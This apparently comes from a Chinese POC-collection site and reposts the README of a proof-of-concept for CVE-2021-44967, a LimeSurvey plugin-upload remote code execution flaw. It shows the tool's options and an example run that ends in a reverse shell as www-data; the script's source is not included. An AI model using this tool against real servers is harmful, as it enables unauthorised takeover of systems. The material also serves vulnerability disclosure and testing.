关联漏洞
标题:
LimeSurvey 代码问题漏洞
(CVE-2021-44967)
描述:LimeSurvey(前称PHPSurveyor)是LimeSurvey(Limesurvey)团队的一套开源的在线问卷调查程序,它支持调查程序开发、调查问卷发布以及数据收集等功能。 LimeSurvey 5.2.4 存在安全漏洞,该漏洞允许远程恶意用户上传任意PHP代码文件。
描述
POC for CVE-2021-44967: LimeSurvey RCE
介绍
# CVE-2021-44967: LimeSurvey RCE
## Description
This Proof-of-Concept (POC) can be used to exploit CVE-2021-44967 to upload and execute a malicious LimeSurvey PHP plugin as administrator to obtain a reverse shell.
A Remote Code Execution (RCE) vulnerabilty exists in LimeSurvey 5.2.4 via the upload and install plugins function, which could let a remote malicious user upload an arbitrary PHP code file.
Severity: 8.3 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
## Usage
```text
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
```
## Example
```sh
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Tested on LimeSurvey Community Edition Version 6.6.4.
## References
- [CVE-2021-44967](https://nvd.nist.gov/vuln/detail/CVE-2021-44967)
- [Original POC](https://github.com/Y1LD1R1M-1337/Limesurvey-RCE)
文件快照
[4.0K] /data/pocs/4622b2c3398e4d08ad31245f968c7e9e1782b67c
├── [6.8K] limesurvey_rce.py
└── [2.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。